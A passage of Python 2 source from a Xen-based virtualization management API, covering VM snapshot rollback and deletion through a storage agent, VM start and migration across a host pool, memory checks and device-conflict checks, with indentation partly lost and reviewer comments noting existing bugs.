if cmp(sr_type, 'gpfs') == 0:
log.debug('gpfs snapshot>>>>>')
mount_point = sr_rec['mount_point']
log.debug('mount_point: %s' % mount_point)
proxy = ServerProxy("http://127.0.0.1:10010")
result = proxy.snapshot_gpfs(mount_point, vdi_ref, name)
elif cmp(sr_type, 'mfs') == 0:
log.debug('mfs snapshot>>>>>>')
mount_point = sr_rec['mount_point']
log.debug('mount_point: %s' % mount_point)
proxy = ServerProxy("http://127.0.0.1:10010")
result = proxy.snapshot_mfs(mount_point, vdi_ref, name)
elif cmp(sr_type, 'ocfs2') == 0:
mount_point = sr_rec['mount_point']
log.debug('mount_point: %s' % mount_point)
proxy = ServerProxy("http://127.0.0.1:10010")
result = proxy.snapshot_ocfs2(mount_point, vdi_ref, name)
elif cmp(sr_type, 'local_ocfs2') == 0:
mount_point = sr_rec['mount_point']
log.debug('mount_point: %s' % mount_point)
proxy = ServerProxy("http://127.0.0.1:10010")
result = proxy.snapshot_ocfs2(mount_point, vdi_ref, name)
else:
sr_ip = sr_rec['other_config']['location'].split(":")[0]
log.debug("sr ip : %s" % sr_ip)
proxy = ServerProxy("http://%s:10010" % sr_ip)
result = proxy.snapshot(sr, vdi_ref, name)
log.debug("snapshot result : %s " % result)
return xen_api_success(result)
def VM_rollback(self, session, vm_ref, name):
'''
@author: wuyuewen
@summary: Rollback a snapshot of VM's system VDI. The sragent must running in Host, use host 10010 port.
@precondition: sragent is running in host.
@param session: session of RPC.
@param vm_ref: VM's uuid
@param name: snapshot's name
@return: True | False
@rtype: dict.
'''
vdi_ref = self.VM_get_system_VDI(session, vm_ref).get('Value')
# log.debug('system vdi_ref: %s' % vdi_ref)
return self._VM_rollback_vdi(session, vdi_ref, name)
    def _VM_rollback_vdi(self, session, vdi_ref, name):
        '''
        @author: wuyuewen
        @summary: Internal method. Roll the given VDI back to snapshot <name>
                  via the sragent (port 10010) matching the SR type.
        @see: VM_rollback
        @return: True | False wrapped in xen_api_success.
        '''
        storage = self._get_BNStorageAPI_instance()
        vdi_rec = storage.VDI_get_record(session, vdi_ref).get('Value', '')
        if not vdi_rec:
            log.debug('VM_snapshot_vdi>>>>>vdi do not exist...')
            return xen_api_success(False)
        sr = vdi_rec['SR']
        log.debug("sr : %s>>>>>>>>>>" % sr)
        sr_rec = storage._SR_get_record("", sr).get('Value')
        if not sr_rec:
            log.debug('sr record do not exist>>>>')
            return xen_api_success(False)
        sr_type = sr_rec.get('type')
        result = False
        if cmp(sr_type, 'gpfs') == 0:
            log.debug('rollback gpfs>>>>>')
            # location looks like "<host>:<path>"; p_location is the file path.
            p_location = vdi_rec['location'].split(':')[1]
            index = p_location.rfind('/')
            # NOTE(review): if p_location contains no '/', snap_location and
            # new_location are never assigned and the proxy call below raises
            # NameError -- confirm whether that path can occur.
            if index != -1:
                file_name = p_location[index+1:]
                new_location = p_location[:index+1] + name + p_location[index+1:]
                snap_location = '%s/%s/.snapshots/%s/%s' %(sr_rec['location'], vdi_ref, \
                                                           name, file_name)
                log.debug('=====>VM rollback :snap location %s=====' % snap_location)
                log.debug('new_location: %s' % new_location)
            proxy = ServerProxy("http://127.0.0.1:10010")
            result = proxy.rollback_gpfs(snap_location, new_location, p_location)
        elif cmp(sr_type, 'mfs') == 0:
            log.debug('mfs snapshot>>>>>>')
            mfs_name = sr_rec['mfs_name']
            log.debug('mfs_name: %s' % mfs_name)
            proxy = ServerProxy("http://127.0.0.1:10010")
            result = proxy.rollback_mfs(mfs_name, vdi_ref, name)
        elif cmp(sr_type, 'ocfs2') == 0:
            # NOTE(review): log text says 'mfs' but this is the ocfs2 branch.
            log.debug('mfs snapshot>>>>>>')
            mount_point = sr_rec['mount_point']
            proxy = ServerProxy("http://127.0.0.1:10010")
            result = proxy.rollback_ocfs2(mount_point, vdi_ref, name)
        elif cmp(sr_type, 'local_ocfs2') == 0:
            log.debug('mfs snapshot>>>>>>')
            mount_point = sr_rec['mount_point']
            proxy = ServerProxy("http://127.0.0.1:10010")
            result = proxy.rollback_ocfs2(mount_point, vdi_ref, name)
        else:
            # Remote SR: contact the storage server's agent.
            sr_ip = sr_rec['other_config']['location'].split(":")[0]
            log.debug("sr ip : %s" % sr_ip)
            proxy = ServerProxy("http://%s:10010" % sr_ip)
            result = proxy.rollback(sr, vdi_ref, name)
        log.debug("rollback result : %s " % result)
        return xen_api_success(result)
def VM_destroy_snapshot(self, session, vm_ref, name):
'''
@author: wuyuewen
@summary: Destroy a snapshot of VM's system VDI. The sragent must running in Host, use host 10010 port.
@precondition: sragent is running in host.
@param session: session of RPC.
@param vm_ref: VM's uuid
@param name: snapshot's name
@return: True | False
@rtype: dict.
'''
vdi_ref = self.VM_get_system_VDI(session, vm_ref).get('Value')
# log.debug('system vdi_ref: %s' % vdi_ref)
return self._VM_destroy_vdi_snapshot(session, vdi_ref, name)
def VM_destroy_all_snapshots(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Destroy all snapshots of VM's system VDI. The sragent must running in Host, use host 10010 port.
@precondition: sragent is running in host.
@param session: session of RPC.
@param vm_ref: VM's uuid
@return: True | False
@rtype: dict.
'''
vdi_ref = self.VM_get_system_VDI(session, vm_ref).get('Value')
# log.debug('system vdi_ref: %s' % vdi_ref)
return self._VM_destroy_all_vdi_snapshots(session, vdi_ref)
def _VM_destroy_all_vdi_snapshots(self, session, vdi_ref, sr = None):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_destroy_all_snapshots
'''
storage = self._get_BNStorageAPI_instance()
if not sr:
vdi_rec = storage.VDI_get_record(session, vdi_ref).get('Value', '')
if not vdi_rec:
log.debug('VM_snapshot_vdi>>>>>vdi do not exist...')
return xen_api_success(False)
sr = vdi_rec['SR']
log.debug("sr : %s>>>>>>>>>>" % sr)
sr_rec = storage._SR_get_record("", sr).get('Value')
if not sr_rec:
log.debug('sr record do not exist>>>>')
return xen_api_success(False)
sr_type = sr_rec.get('type')
result = False
if cmp(sr_type, 'gpfs') == 0:
gpfs_name = sr_rec['gpfs_name']
log.debug('gpfs_name: %s' % gpfs_name)
proxy = ServerProxy("http://127.0.0.1:10010")
result = proxy.destroy_all_gpfs(gpfs_name, vdi_ref)
elif cmp(sr_type, 'mfs') == 0:
mfs_name = sr_rec['mfs_name']
log.debug('mfs_name: %s' % mfs_name)
proxy = ServerProxy("http://127.0.0.1:10010")
log.debug(vdi_ref)
result = proxy.destroy_all_mfs(mfs_name, vdi_ref)
elif cmp(sr_type, 'ocfs2') == 0:
mount_point = sr_rec['mount_point']
proxy = ServerProxy("http://127.0.0.1:10010")
log.debug(vdi_ref)
result = proxy.destroy_all_ocfs2(mount_point, vdi_ref)
elif cmp(sr_type, 'local_ocfs2') == 0:
mount_point = sr_rec['mount_point']
proxy = ServerProxy("http://127.0.0.1:10010")
log.debug(vdi_ref)
result = proxy.destroy_all_ocfs2(mount_point, vdi_ref)
else:
sr_ip = sr_rec['other_config']['location'].split(":")[0]
log.debug("sr rec : %s" % sr_rec)
log.debug("sr ip : %s" % sr_ip)
proxy = ServerProxy("http://%s:10010" % sr_ip)
result = proxy.destroy_all(sr, vdi_ref)
log.debug("destroy_snapshot result : %s " % result)
if result == True: # destroy succeed
inUse = vdi_rec.get('inUse', True)
log.debug('vdi in use>>>>>>>>>>>>>>%s' % inUse)
if not inUse:
storage.VDI_destroy_final(session, vdi_ref, True, True)
return xen_api_success(result)
    def _VM_destroy_vdi_snapshot(self, session, vdi_ref, name):
        '''
        @author: wuyuewen
        @summary: Internal method. Destroy the named snapshot of the given VDI
                  via the sragent (port 10010) matching the SR type. If the
                  VDI is unused and this was its last snapshot, the VDI record
                  is removed as well.
        @see: VM_destroy_snapshot
        @return: True | False wrapped in xen_api_success.
        '''
        storage = self._get_BNStorageAPI_instance()
        vdi_rec = storage.VDI_get_record(session, vdi_ref).get('Value', '')
        if not vdi_rec:
            log.debug('VM_snapshot_vdi>>>>>vdi do not exist...')
            return xen_api_success(False)
        sr = vdi_rec['SR']
        log.debug("sr : %s>>>>>>>>>>" % sr)
        sr_rec = storage._SR_get_record("", sr).get('Value')
        if not sr_rec:
            log.debug('sr record do not exist>>>>')
            return xen_api_success(False)
        sr_type = sr_rec.get('type')
        result = False
        if cmp(sr_type, 'gpfs') == 0:
            gpfs_name = sr_rec['gpfs_name']
            log.debug('gpfs_name: %s' % gpfs_name)
            proxy = ServerProxy("http://127.0.0.1:10010")
            result = proxy.destroy_gpfs(gpfs_name, vdi_ref, name)
        elif cmp(sr_type, 'mfs') == 0:
            mfs_name = sr_rec['mfs_name']
            log.debug('mfs_name: %s' % mfs_name)
            proxy = ServerProxy("http://127.0.0.1:10010")
            log.debug(vdi_ref)
            log.debug(name)
            result = proxy.destroy_mfs(mfs_name, vdi_ref, name)
        elif cmp(sr_type, 'ocfs2') == 0:
            mount_point = sr_rec['mount_point']
            proxy = ServerProxy("http://127.0.0.1:10010")
            log.debug(vdi_ref)
            result = proxy.destroy_ocfs2(mount_point, vdi_ref, name)
        elif cmp(sr_type, 'local_ocfs2') == 0:
            mount_point = sr_rec['mount_point']
            proxy = ServerProxy("http://127.0.0.1:10010")
            log.debug(vdi_ref)
            result = proxy.destroy_ocfs2(mount_point, vdi_ref, name)
        else:
            # Remote SR: contact the storage server's agent.
            sr_ip = sr_rec['other_config']['location'].split(":")[0]
            log.debug("sr rec : %s" % sr_rec)
            log.debug("sr ip : %s" % sr_ip)
            proxy = ServerProxy("http://%s:10010" % sr_ip)
            result = proxy.destroy(sr, vdi_ref, name)
        log.debug("destroy_snapshot result : %s " % result)
        # If the VDI is not attached to any VM and no snapshots remain,
        # drop the VDI record itself.
        inUse = vdi_rec.get('inUse', True)
        log.debug('vdi in use>>>>>>>>>>>>>>%s' % inUse)
        if not inUse:
            snap_num = len(self._VM_get_vdi_snapshots(session, vdi_ref).get('Value'))
            if snap_num == 0:
                storage.VDI_destroy_final(session, vdi_ref, True, True)
        return xen_api_success(result)
def VM_resume(self, session, vm_ref, start_paused):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_resume(session, vm_ref, start_paused)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_resume', vm_ref, start_paused)
else:
return self._VM_resume(session, vm_ref, start_paused)
def _VM_resume(self, session, vm_ref, start_paused):
'''
@deprecated: not used
'''
return XendTask.log_progress(0, 100, do_vm_func,
"domain_resume", vm_ref,
start_paused = start_paused)
def VM_start(self, session, vm_ref, start_paused, force_start):
'''
@author: wuyuewen
@summary: Start the specified VM. This function can only be called with the VM is in the Halted State.
@param session: session of RPC.
@param vm_ref: VM's uuid
@param: start_paused
Instantiate VM in paused state if set to true.
@param: force_start
Attempt to force the VM to start. If this flag is false then
the VM may fail pre-boot safety checks (e.g. if the CPU the VM
last booted on looks substantially different to the current
one)
@return: True | False
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
host_ip = BNPoolAPI.get_host_ip(host_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_start(session, vm_ref, start_paused, force_start)
else:
return xen_rpc_call(host_ip, 'VM_start', vm_ref, start_paused, force_start)
else:
return self._VM_start(session, vm_ref, start_paused, force_start)
    def _VM_start(self, session, vm_ref, start_paused, force_start):
        '''
        @author: wuyuewen
        @summary: Internal method. Run pre-start checks (free memory, fiber
                  devices, usb/scsi devices) and then start the domain through
                  the task-logged do_vm_func helper.
        @see: VM_start
        '''
        # NOTE(review): _VM_can_start returns an xen_api_error *dict* (truthy)
        # for the VM-not-found / is-a-template cases, so this guard only
        # catches the plain False "not enough memory" result -- confirm.
        if not self._VM_can_start(session, vm_ref):
            return xen_api_error(['MEMORY_NOT_ENOUGH', 'VM', vm_ref])
        crush_vm = self._VM_check_fibers_valid(session, vm_ref).get('Value')
        if crush_vm:
            return xen_api_error(['FIBER_IN_USE:', crush_vm])
        crush_vm = self._VM_check_usb_scsi_valid(session, vm_ref).get('Value')
        if crush_vm:
            return xen_api_error(['USB_IN_USE:', crush_vm])
        try:
            log.debug("VM starting now....")
            response = XendTask.log_progress(0, 100, do_vm_func,
                                             "domain_start", vm_ref,
                                             start_paused=start_paused,
                                             force_start=force_start)
            log.debug(response)
            return response
        except HVMRequired, exn:
            log.error(exn)
            return xen_api_error(['VM_HVM_REQUIRED', vm_ref])
#add by wufan
def VM_can_start(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Check specified VM can start or not, check host free memory.
@param session: session of RPC.
@param vm_ref: VM's uuid
@return: True | False
@rtype: dict
@raise xen_api_error:
'''
return xen_api_success(self._VM_can_start(session, vm_ref))
    def _VM_can_start(self, session, vm_ref):
        '''
        @author: wuyuewen
        @summary: Internal method. Decide whether the host keeps at least
                  RESERVED_MEM free after subtracting this VM's dynamic-max
                  memory from current free memory.
        @see: VM_can_start
        @return: True | False on the normal path.
                 NOTE(review): the VM-not-found and is-a-template paths return
                 xen_api_error dicts instead, which are *truthy*, so callers
                 doing `if not self._VM_can_start(...)` treat those error
                 cases as "can start" -- confirm whether that is intended.
        '''
        host_mem_free = self._host_metrics_get_memory_free()
        dominfo = XendDomain.instance().get_vm_by_uuid(vm_ref)
        if not dominfo:
            log.debug("can not find vm:" + vm_ref)
            return xen_api_error(['VM_NOT_FOUND', 'VM', vm_ref])
        if self._VM_get_is_a_template(session, vm_ref).get('Value'):
            return xen_api_error(XEND_API_ERROR_VM_IS_TEMPLATE)
        dom_mem = dominfo.get_memory_dynamic_max()
        free_memory = int(host_mem_free) - int(dom_mem)
        log.debug("can start: %s, memory left limit: %sG" % (str(cmp(free_memory, RESERVED_MEM) > 0), str(RESERVED_MEM/1024/1024/1024)))
        log.debug("free memory: %sG" % str(free_memory/1024/1024/1024))
        # by henry, dom0 memory should greate than 4G
        if cmp(free_memory, RESERVED_MEM) > 0:
            return True
        else:
            return False
def _host_metrics_get_memory_free(self):
'''
@author: wuyuewen
@summary: Internal method.
@see: host_metrics_get_memory_free
'''
node = XendNode.instance()
xendom = XendDomain.instance()
doms = xendom.list()
doms_mem_total = 0
for dom in doms:
if cmp(dom.get_uuid(), DOM0_UUID) == 0:
continue
dominfo = xendom.get_vm_by_uuid(dom.get_uuid())
doms_mem_total += dominfo.get_memory_dynamic_max()
# log.debug("doms memory total: " + str(doms_mem_total))
# log.debug("host memory total:" + str(node.xc.physinfo()['total_memory'] * 1024))
return node.xc.physinfo()['total_memory'] * 1024 - doms_mem_total
    '''
    Check whether the VM's vifs have been created and are up.
    '''
def _VM_check_vif_up(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method.
'''
log.debug('check if vif up >>>>>>>>>>')
# get vm domid
dominfo = XendDomain.instance().get_vm_by_uuid(vm_ref)
domid = dominfo.getDomid()
vif_num = len(dominfo.get_vifs()) # get num of vifs
log.debug('vm(%) domid(%s) has %s vifs' % (vm_ref, domid, vif_num))
for eth_num in range(vif_num):
vif_dev = 'vif%s.%s' % (domid, eth_num)
vif_emu_dev = 'vif%s.%-emu' %(domid, eth_num)
# def _VM_check_fiber(self, session, vm_ref):
# if self._VM_check_fibers_valid(session, vm_ref).get('Value'):
# return True
# else :
# log.debug('fiber device in use')
# return False
    def VM_start_on(self, session, vm_ref, host_ref, start_paused, force_start):
        '''
        @author: wuyuewen
        @summary: Start the specified VM on a specified Host. Only valid while
                  the VM is Halted. When the destination differs from the
                  host currently owning the VM, the VM is moved by exporting
                  its sxp config to the shared HA directory, re-creating the
                  domain on the destination and destroying the original.
        @param session: session of RPC.
        @param vm_ref: VM's uuid
        @param host_ref: destination Host's uuid
        @param start_paused: instantiate the VM in paused state if True.
        @param force_start: attempt to force the start; if False the VM may
               fail pre-boot safety checks (e.g. if the CPU the VM last
               booted on looks substantially different to the current one).
        @return: True | False
        @rtype: dict.
        '''
        try:
            log.debug("in VM_start_on: %s" % vm_ref)
            if BNPoolAPI._isMaster:
                # Local-only VMs cannot be placed; fall back to a plain start.
                if self.VM_get_is_local_vm(session, vm_ref).get('Value'):
                    return self.VM_start(session, vm_ref, start_paused, force_start)
                xennode = XendNode.instance()
                master_uuid = xennode.uuid
                h_ref = BNPoolAPI.get_host_by_vm(vm_ref)
                h_ip = BNPoolAPI.get_host_ip(h_ref)
                log.debug(h_ip)
                host_ip = BNPoolAPI.get_host_ip(host_ref)
                paths = xennode.get_ha_sr_location()
                log.debug(paths)
#                if cmp(paths, {}) !=0:
                if paths:
                    # Use the first HA SR path for the transfer file.
                    for p in paths.values():
#                        path = os.path.join(p, CACHED_CONFIG_FILE)
                        path = os.path.join(p, '%s.sxp' % vm_ref)
                        break
                else:
                    path = ''
                log.debug('vm_start_on ha path: %s' % path)
#                else:
#                    return xen_api_error(['nfs_ha not mounted', NFS_HA_DEFAULT_PATH])
                #copy sxp file to nfs
                xen_rpc_call(h_ip, 'VM_copy_sxp_to_nfs', vm_ref, path)
                # Four-way dispatch on (destination, current owner) vs master.
                if cmp(host_ref, master_uuid) == 0 and cmp(master_uuid, h_ref) == 0:
                    log.debug("-----condition 1-----")
                    log.debug("vm dest: master, vm now: master")
                    response = self._VM_start(session, vm_ref, start_paused, force_start)
                elif cmp(host_ref, master_uuid) == 0 and cmp(master_uuid, h_ref) != 0:
                    log.debug("-----condition 2-----")
                    log.debug("vm dest: master, vm now: node")
                    response = self.VM_create_from_sxp(session, path, True, False)
                    if cmp (response.get('Status'), 'Success') == 0:
                        xen_rpc_call(h_ip, 'VM_destroy', vm_ref, False, False, False)
                elif cmp(host_ref, master_uuid) != 0 and cmp(master_uuid, h_ref) == 0:
                    log.debug("-----condition 3-----")
                    log.debug("vm dest: node, vm now: master")
                    response = xen_rpc_call(host_ip, 'VM_create_from_sxp', path, True, False)
                    if cmp (response.get('Status'), 'Success') == 0:
                        self._VM_destroy(session, vm_ref, False, False)
                elif cmp(host_ref, master_uuid) != 0 and cmp(master_uuid, h_ref) != 0:
                    if cmp(h_ref, host_ref) == 0:
                        log.debug("-----condition 4-----")
                        log.debug("vm dest: node1, vm now: node2, node1 = node2")
                        response = self.VM_start(session, vm_ref, start_paused, force_start)
                    else:
                        log.debug("-----condition 5-----")
                        log.debug("vm dest: node1, vm now: node2, node1 != node2")
                        response = xen_rpc_call(host_ip, 'VM_create_from_sxp', path, True, False)
                        if cmp (response.get('Status'), 'Success') == 0:
                            xen_rpc_call(h_ip, 'VM_destroy', vm_ref, False, False, False)
                if cmp (response.get('Status'), 'Success') == 0:
                    BNPoolAPI.update_data_struct('vm_start_on', vm_ref, h_ref, host_ref)
                    log.debug("Finished start on: %s migrate vm(%s) to %s" % (h_ip, vm_ref, host_ip))
                return response
            else:
                # path must exist for the finally block below.
                path = ''
                return self.VM_start(session, vm_ref, start_paused, force_start)
        except Exception, exn:
            log.exception(traceback.print_exc())
            return xen_api_error(['START_ON_FAILED,', exn])
        finally:
            # Always remove the temporary sxp transfer file.
            if path:
                cmd = 'rm -f %s' % path
                doexec(cmd)
def VM_copy_sxp_to_nfs(self, session, vm_ref, path):
'''
@author: wuyuewen
@summary: Internal method. Copy sxp to HA dir.
'''
XendDomain.instance().copy_sxp_to_ha(vm_ref, path)
return xen_api_success_void()
def VM_suspend(self, session, vm_ref):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_suspend(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_suspend', vm_ref)
else:
return self._VM_suspend(session, vm_ref)
    def _VM_suspend(self, session, vm_ref):
        '''
        @deprecated: not used
        @summary: Suspend the domain locally via XendTask progress logging (0-100).
        '''
        # do_vm_func presumably resolves vm_ref and invokes
        # XendDomain.domain_suspend on it -- confirm against do_vm_func impl.
        return XendTask.log_progress(0, 100, do_vm_func,
                                     "domain_suspend", vm_ref)
def VM_unpause(self, session, vm_ref):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_unpause(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_unpause', vm_ref)
else:
return self._VM_unpause(session, vm_ref)
    def _VM_unpause(self, session, vm_ref):
        '''
        @deprecated: not used
        @summary: Unpause the domain locally via XendTask progress logging (0-100).
        '''
        # Mirrors _VM_suspend; dispatches through do_vm_func.
        return XendTask.log_progress(0, 100, do_vm_func,
                                     "domain_unpause", vm_ref)
def VM_send_sysrq(self, _, vm_ref, req):
'''
@deprecated: not used
'''
xeninfo = XendDomain.instance().get_vm_by_uuid(vm_ref)
if xeninfo.state == XEN_API_VM_POWER_STATE_RUNNING \
or xeninfo.state == XEN_API_VM_POWER_STATE_PAUSED:
xeninfo.send_sysrq(req)
return xen_api_success_void()
else:
return xen_api_error(
['VM_BAD_POWER_STATE', vm_ref,
XendDomain.POWER_STATE_NAMES[XEN_API_VM_POWER_STATE_RUNNING],
XendDomain.POWER_STATE_NAMES[xeninfo.state]])
def VM_send_trigger(self, _, vm_ref, trigger, vcpu):
'''
@deprecated: not used
'''
xendom = XendDomain.instance()
xeninfo = xendom.get_vm_by_uuid(vm_ref)
xendom.domain_send_trigger(xeninfo.getDomid(), trigger, vcpu)
return xen_api_success_void()
def VM_migrate(self, session, vm_ref, destination_url, live, other_config):
'''
@deprecated: not used
'''
return self._VM_migrate(session, vm_ref, destination_url, live, other_config)
    def _VM_migrate(self, session, vm_ref, destination_url, live, other_config):
        '''
        @author: wuyuewen
        @summary: Internal method. Migrate the domain to destination_url after
            first tearing down any per-domain IO rate limits (they are
            re-applied by the caller, see VM_pool_migrate).
        @param other_config: optional dict; recognised keys are "port",
            "node", "ssl" and "change_home_server" -- defaults 0/-1/None/False.
        @see: VM_pool_migrate
        '''
        # IO limits must be removed before the domain leaves this host.
        self._VM_clean_IO_limit_shutdown(session, vm_ref) #add by wufan
        xendom = XendDomain.instance()
        xeninfo = xendom.get_vm_by_uuid(vm_ref)
        port = other_config.get("port", 0)
        node = other_config.get("node", -1)
        ssl = other_config.get("ssl", None)
        chs = other_config.get("change_home_server", False)
        xendom.domain_migrate(xeninfo.getDomid(), destination_url,
                              bool(live), port, node, ssl, bool(chs))
        #log.debug('migrate')
        # set all tag
        #self.VM_set_all_tag(session, vm_ref)
        return xen_api_success_void()
    def VM_pool_migrate(self, session, vm_ref, dst_host_ref, other_config):
        '''
        @author: wuyuewen
        @summary: Migrate specified VM to specified Host. IO limit setting must be read
            before migrate and set back after migrate (migration clears them).
        @param session: session of RPC.
        @param vm_ref: VM's uuid
        @param dst_host_ref: destination Host's uuid
        @param other_config: useless
        @return: True | False
        @rtype: dict.
        '''
        host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
        host_ip = BNPoolAPI.get_host_ip(host_ref)
        dst_host_ip = BNPoolAPI.get_host_ip(dst_host_ref)
        # Snapshot tags / rate limits so they survive the migration.
        tag_list = self.VM_get_all_tag(session, vm_ref, 'tag').get('Value')
        rate_list = self.VM_get_all_tag(session, vm_ref, 'rate').get('Value')
        burst_list = self.VM_get_all_tag(session, vm_ref, 'burst').get('Value')
        io_limit_list = {}
        # NOTE(review): loop variable shadows the builtin 'type'.
        for type in ['read', 'write']:
            for io_unit in ['MBps', 'iops']:
                key = "%s_%s" % (type, io_unit)
                io_limit_list[key] = self.VM_get_IO_rate_limit(session, vm_ref, type, io_unit).get('Value')
        if cmp(host_ref, XendNode.instance().uuid) == 0:
            self._VM_migrate(session, vm_ref, dst_host_ip, True, other_config)
        else:
            # NOTE(review): host_ip is recomputed here although already set above.
            host_ip = BNPoolAPI.get_host_ip(host_ref)
            xen_rpc_call(host_ip, "VM_migrate", vm_ref, dst_host_ip, True, other_config)
        log.debug("Migrate VM from host: %s" % host_ip)
        log.debug("Migrate VM to host: %s" % dst_host_ip)
        BNPoolAPI.update_data_struct("vm_migrate", vm_ref, host_ref, dst_host_ref)
        # Re-apply the snapshot taken before migration.
        self.VM_set_all_tag(session, vm_ref, tag_list)
        self.VM_set_all_rate(session, vm_ref, 'rate', rate_list)
        self.VM_set_all_rate(session, vm_ref, 'burst', burst_list)
        self.VM_start_set_IO_limit(session, vm_ref, io_limit_list)
        return xen_api_success_void()
def VM_save(self, _, vm_ref, dest, checkpoint):
'''
@deprecated: not used
'''
xendom = XendDomain.instance()
xeninfo = xendom.get_vm_by_uuid(vm_ref)
xendom.domain_save(xeninfo.getDomid(), dest, checkpoint)
return xen_api_success_void()
def VM_restore(self, _, src, paused):
'''
@deprecated: not used
'''
xendom = XendDomain.instance()
xendom.domain_restore(src, bool(paused))
return xen_api_success_void()
def VM_check_usb_scsi_valid(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Check usb scsi validity.
'''
return self._VM_check_usb_scsi_valid(session, vm_ref)
def _VM_check_usb_scsi_valid(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Check usb scsi validity.
'''
log.debug('VM_check_fibers_valid')
crush_vm = None
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
#get local fiber uuid of the to_started vm
loc_fiber_unames = []
loc_fiber_uuids= self._VM_get_usb_scsi(session, vm_ref).get('Value')
# get local fiber uname of the to_started vm
for loc_fiber_uuid in loc_fiber_uuids:
dev_type, dev_config = dominfo.info['devices'].get(loc_fiber_uuid, (None, None))
if dev_config:
loc_fiber_uname = dev_config.get('uname')
if loc_fiber_uname:
loc_fiber_unames.append(loc_fiber_uname)
if loc_fiber_unames:
running_vms = xd.get_running_vms()
for vm in running_vms:
#if vm.info.get('domid') == dominfo.info.get('domid'):
#log.debug('check dom itself %s' % vm.info.get('domid'))
#continue
device_struct = vm.info['devices']
for uuid, config in device_struct.items():
if config[1].get('uname') in loc_fiber_unames:
vm_name = vm.info['name_label']
crush_vm = vm_name
return xen_api_success(crush_vm)
return xen_api_success(crush_vm)
def VM_check_fibers_valid(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Check fibers validity.
'''
return self._VM_check_fibers_valid(session, vm_ref)
    #add by wufan
    def _VM_check_fibers_valid(self, session, vm_ref):
        '''
        @author: wuyuewen
        @summary: Internal method. Check whether any fiber-channel device of
            this VM is already used by a running VM.
        @return: name_label of the conflicting running VM, or None when free.
        '''
        log.debug('VM_check_fibers_valid')
        crush_vm = None
        xd = XendDomain.instance()
        dominfo = xd.get_vm_by_uuid(vm_ref)
        #get local fiber uuid of the to_started vm
        loc_fiber_unames = []
        loc_fiber_uuids= self._VM_get_fibers(session, vm_ref).get('Value')
        # get local fiber uname of the to_started vm
        for loc_fiber_uuid in loc_fiber_uuids:
            dev_type, dev_config = dominfo.info['devices'].get(loc_fiber_uuid, (None, None))
            if dev_config:
                loc_fiber_uname = dev_config.get('uname')
                if loc_fiber_uname:
                    loc_fiber_unames.append(loc_fiber_uname)
        if loc_fiber_unames:
            # Scan every running VM for a device backed by the same uname.
            running_vms = xd.get_running_vms()
            for vm in running_vms:
                #if vm.info.get('domid') == dominfo.info.get('domid'):
                    #log.debug('check dom itself %s' % vm.info.get('domid'))
                    #continue
                device_struct = vm.info['devices']
                for uuid, config in device_struct.items():
                    if config[1].get('uname') in loc_fiber_unames:
                        vm_name = vm.info['name_label']
                        crush_vm = vm_name
                        return xen_api_success(crush_vm)
        return xen_api_success(crush_vm)
    def VM_cpu_pool_migrate(self, session, vm_ref, cpu_pool_ref):
        '''
        @deprecated: not used
        @summary: Move the domain into another cpu pool; Domain-0 is refused.
        '''
        xendom = XendDomain.instance()
        xeninfo = xendom.get_vm_by_uuid(vm_ref)
        domid = xeninfo.getDomid()
        pool = XendAPIStore.get(cpu_pool_ref, XendCPUPool.getClass())
        if pool == None:
            return xen_api_error(['HANDLE_INVALID', 'cpu_pool', cpu_pool_ref])
        if domid is not None:
            if domid == 0:
                # Moving Domain-0 out of its pool is never allowed.
                return xen_api_error(['OPERATION_NOT_ALLOWED',
                    'could not move Domain-0'])
            try:
                XendCPUPool.move_domain(cpu_pool_ref, domid)
            except Exception, ex:
                # NOTE(review): the original exception 'ex' is swallowed here.
                return xen_api_error(['INTERNAL_ERROR',
                    'could not move domain'])
        self.VM_set('pool_name', session, vm_ref, pool.get_name_label())
        return xen_api_success_void()
def VM_create_data_VBD(self, session, vm_ref, vdi_ref, read_only=False):
'''
@author: wuyuewen
@summary: VM create data VBD and VDI.
@precondition: At most 8 data VBD.
@param session: session of RPC.
@param vm_ref: VM's uuid
@param vdi_ref: new VDI's uuid
@return: True | False
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_create_data_VBD(session, vm_ref, vdi_ref, read_only)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_create_data_VBD', vm_ref, vdi_ref, read_only)
else:
return self._VM_create_data_VBD(session, vm_ref, vdi_ref, read_only)
def _VM_create_data_VBD(self, session, vm_ref, vdi_ref, read_only):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_create_data_VBD
'''
log.debug("=====VM_create_data_VBD=====")
if not read_only:
vbd_struct = {'VM' : vm_ref,
'VDI' : vdi_ref,
'bootable' : False,
# 'device' : self._VM_get_available_vbd_device(session, vm_ref, 'xvd').get('Value', ''),
'mode' : 'RW',
'type' : 'Disk',
}
else:
vbd_struct = {'VM' : vm_ref,
'VDI' : vdi_ref,
'bootable' : False,
